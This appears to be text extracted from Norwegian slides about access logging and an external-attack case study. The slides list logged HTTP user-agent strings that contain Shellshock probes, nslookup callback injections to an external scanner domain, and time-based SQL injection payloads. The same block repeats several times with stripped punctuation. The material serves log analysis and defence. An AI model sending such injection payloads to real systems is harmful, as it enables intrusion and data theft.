Read Access LogDriver er ofte regulatoriske krav og offentlige standarder
Full overvaringkning av les og aksess av sensitive data
TBD
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Case - eksternt angrep
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Case - eksternt angrep
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Case - eksternt angrep
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom
Thomas Tinglum thomaszedgenet
Roger Skjetlein rogerbasis-consultingcom